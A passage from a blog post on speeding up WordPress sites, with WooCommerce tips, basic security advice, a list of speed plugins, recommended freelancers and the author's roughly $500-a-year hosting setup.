WooCommerce sites often have more plugins, scripts, styles, and are more resource-hungry than static sites. You will need to optimize your website even more if you want good results.

  • Hosting – wphostingbenchmarks.com ran tests for multiple WooCommerce hosts, although I think there are much better options than the ones tested (I would personally lean towards something like Rocket.net, GridPane, RunCloud). Obviously very important.
  • Remove WooCommerce admin bloat – Disable WooCommerce Bloat is good for this.
  • Cloudflare Argo + Tiered Cache  – specifically good for speeding up dynamic requests.
  • Redis – also specifically good for WooCommerce (especially Redis Object Cache Pro).
  • Go easy on WooCommerce Extensions – just like other plugins, be minimal with these.
  • Unload WooCommerce plugins – Woo plugins are infamously bad with loading across your entire site. Use your asset unloading plugin to disable them where they’re not used.
  • Product image size – Appearance → Customize → WooCommerce → Product Images.
  • Increase memory limit – WooCommerce sites usually require increasing it even more.
  • Browser cache TTL – Google recommends 1 year but 1 month is good for dynamic sites.
  • Elasticsearch – speeds up searches especially for websites with thousands of products.
  • Delete expired transients – these can build up quickly so delete them more frequently.

22. Security

With the right optimizations (and a firewall), you shouldn’t need a security plugin.

Wordpress security checklist 1

A few other tips:

  • Hide your WordPress version.
  • Use a host that takes security seriously.
  • Add security headers (try the HTTP Headers plugin).
  • Use Cloudflare firewall rules (i.e. only access wp-login from your IP).
  • Disable file editing to prevent hackers from editing theme/plugin files.
  • Follow security-related social media accounts like Cloudflare/Wordfence.
  • Check for known vulnerabilities before updating things (especially plugins).

23. PHP Version

Only 7% of websites use PHP 8.

Come on y’all, you already know higher PHP versions are faster and more secure. Google “update PHP version [your host]” and you’ll find instructions. If updating breaks your site, just revert back to your older version (or remove incompatible plugins that aren’t maintained well).

Wordpress php versions
PHP version used by WordPress sites (source: WordPress stats)

24. Make Sure Optimizations Are Working

You set things up, but are they working? Make sure they are.

  • Caching – cache plugins should have documentation to check if the caching is working.
  • Redis/memcached – LiteSpeed Cache’s connection test and most Redis plugins tell you.
Litespeed cache object cache
Confirm Redis is working (screenshot is in LiteSpeed Cache)
  • CDN Analytics – how many requests are you blocking from bots, hotlink protection, and WAF? What is your cache hit ratio (hopefully around 90%)? CDN analytics are very useful.
  • Dr. Flare – Chrome Extension to view tons of Cloudflare stats like your cache hit ratio, uncached requests, non-Cloudflare requests, how much % was reduced by Polish/Minify.
  • CDN rewrites – are your files actually being served from your CDN? Check your CDN Analytics, Dr. Flare, or view your source code to make sure files are being served from the CDN when using a CDN URL, like this: cdn.mywebsite.com/wp-content/uploads/logo.png. If you’re using BunnyCDN, you may be able to serve more files from BunnyCDN by adding your CDN URL to your cache plugin on top of using BunnyCDN’s plugin. It worked for me.
  • APO – verify Cloudflare’s APO is working by testing your website in uptrends.com then making sure headers exactly match with what Cloudflare shows in the documentation.
Test cloudflare apo
Confirm APO is working by checking headers
  • Asynchronous CSS – if you’re using this, cache plugins should also have documentation.
  • External cron jobs – check the logs in your hosting account to make sure these are firing.
  • Waterfall charts – after each optimization, you should ideally check its impact using a Waterfall chart (better than running another PageSpeed Insights test and testing scores).
  • Clear cache – you may need to clear cache or regenerate critical CSS to see your changes.

25. Speed Plugins

Here’s the full list.

Obviously you don’t need all these especially if you’re using a cache/optimization plugin that already does some of these, Cloudflare image optimizations, or you can code things manually.

PluginCategoryPrice
FlyingPressCachePaid
LiteSpeed CacheCacheFree
PerfmattersMultiple CategoriesPaid
CloudflareCDNPaid
Super Page Cache for CloudflareCDNFree
WP-OptimizeDatabaseFree
FlyingProxyCDNPaid
Flying PagesResource HintsFree
Flying ScriptsDelay JavaScriptFree
Flying AnalyticsAnalyticsFree
OptimoleImageFreemium
ShortPixelImageFreemium
ShortPixel Adaptive ImagesImageFreemium
WP YouTube LyteVideoFree
OMGFFontFree
WP Foft LoaderFontFreemium
Pre* Party Resource HintsResource HintsFree
BunnyCDNCDNPaid
WP CrontrolCron JobFree
UnbloaterBloat RemovalFree
DebloatBloat RemovalFree
Disable WooCommerce BloatBloat RemovalFree
Heartbeat ControlBloat RemovalFree
Disable XML-RPCBloat RemovalFree
Widget DisableBloat RemovalFree
Limit Login AttemptsSecurityFree
WPS Hide LoginSecurityFree
Redis Object CacheCacheFree
Blackhole For Bad BotsBlock BotsFree
Simple Local AvatarsCommentsFree
Preload Featured ImagesLCPFree
Query MonitorDiagnosticFree
WP Server Health StatsDiagnosticFree
WP Hosting BenchmarkDiagnosticFree
WP Hosting Performance CheckDiagnosticFree

26. Get Help

Still need help? I’m not for hire, but here’s what I got:

DIY

  • Search the WP Speed Matters Facebook Group.
  • Plugins like Perfmatters have great documentation.
  • Gijo Varghese and WP Johnny also put on quality articles.
  • My other articles (if you liked this one, I have plenty more).

Hire Help

  • BDKamol – Pronaya mainly works with Gutenberg, WooCommerce, and Genesis. He’s been helping me for over 10 years even when I launched my first website and had no visitors. He points me in the right direction and was a key part in launching my new blog, helping me with things like custom coding, CSS styling, theme/plugin recommendations, etc. Pronaya lives in Bangladesh and his communication (and my trust in him) are 100%.
  • WP Johnny – he’s a busy guy but you can try hiring him and his team. I was lucky enough to have him help me remove my page builder (which I regret using in the first place and should have known better). While the work is great, it can take awhile to get things done.
  • WP Fix It – hired them once to improve issues related to core web vitals. While I was very happy with the work, they closed my tickets without notice saying the project was done, even when I told them I would pay more since truly fixing the issues required more work.
Pronaya wordpress speed optimizer

27. My Setup

This will cost about $500/year.

It assumes you already have a lightweight theme (i.e. GeneratePress/Kadence) and pay yearly for Rocket.net since you get 2 months free. It also assumes you’re using Rocket.net’s lower $25/mo plan (I pay $50/mo for the Business plan). For my site, this is the best setup I’ve found.

My blog costs around $800/year which is a lot cheaper than I was paying (mainly because hosting gets expensive as you scale). Scaling on Rocket.net is reasonable since monthly visits and RAM are both 10x Kinsta’s and there’s no PHP worker limits since only about 10% of traffic hits the origin (due to Ben Gabler’s Cloudflare Enterprise setup who I suggest reaching out to).

LiteSpeed is also solid and can be cheaper since LiteSpeed Cache is free and email hosting is often included. Check out NameHeroChemiCloud, and Scala (they seem to have good specs and TrustPilot reviews). RunCloudGridPane, and JohnnyVPS are probably best for larger sites.

Cloudways is who I was using. I still think they’re better than most hosts but it gets expensive with all the add-ons, they use Apache servers, and Cloudflare Enterprise + Breeze need work.

ServicePriceNotes
Rocket.net$25/moRead my full reviewOMM1 = $1 first month1 year =  2 months free
Cloudflare EnterpriseFree on Rocket.netNo configurationFull page cachingI trust their config
GeneratePress$249 (one-time)Less CSS/JSUses GutenbergI use the “Search” theme
GenerateBlocks$39/yrMore block templates
FlyingPress$3.5/mo (renewal price)Gijo’s pluginGreat for CWVAnd for real usersConfigure the settings
Google Workspace$6/moMost cloud host don’t support email hosting
Perfmatters$24.95/yrAsset unloadingBloat removalOptimizations not found in WP Rocket or SG OptimizerConfigure the settings
Total Yearly Price$477.95/yrPlus one-time cost of GeneratePress

Of course I use other tools/plugins, but that’s my foundation.

I hope you learned something new! Drop me a comment with any questions/suggestions.

Cheers,
Tom

Source :
https://onlinemediamasters.com/slow-wordpress-site/